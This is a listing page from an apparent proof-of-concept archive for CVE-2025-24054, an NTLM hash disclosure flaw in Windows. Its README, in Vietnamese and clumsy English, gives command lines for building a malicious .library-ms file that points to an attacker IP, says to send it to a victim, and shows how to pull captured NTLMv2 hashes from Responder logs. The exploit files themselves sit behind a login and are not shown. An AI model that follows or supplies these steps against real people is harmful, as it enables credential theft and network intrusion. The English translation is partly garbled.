Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-24054 PoC — NTLM Hash Disclosure Spoofing Vulnerability

Source
Associated Vulnerability
Title: NTLM Hash Disclosure Spoofing Vulnerability (CVE-2025-24054)
Description:External control of file name or path in Windows NTLM allows an unauthorized attacker to perform spoofing over a network.
Description
CVE 2025 24054
Readme
## VIETNAMESE ##
- Với file CVE-2025-24054.py và  Exploit.library-ms
- Thay ip vào file Exploit.library-ms gửi file cho sau đó chạy CVE-2025-24054.py là OK 
- Đối với ELAINA-POC.py
- Tạo file .library-ms độc hại:
 - python3 ELAINA-POC.py create -ip 192.168.1.100 -o payload.library-ms -
- gửi victim 
Trích xuất hash từ log Responder:
- python3 ELAINA-POC.py extract -f /path/to/Responder/logs/SMB-NTLMv2.lo -
## English ##
- With the file CVE-2025-24054.Py and Exploit.library-MS
- Replace IP to File Exploit.library-MS, send the file and then run CVE-2025-24054.Py is ok
- For elaina-poc.py
- Create a toxic .library-MS file: 
- Python3 Elaina -Poc.py Create -ip 192.168.1.100 -O Payload.library -MS -
- Send Victim
 -Extract the hash from log Responder:
-Python3 Elaina-poc.py Extract -f /path/to/responder/logs/smb-ntlmv2.lo -
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →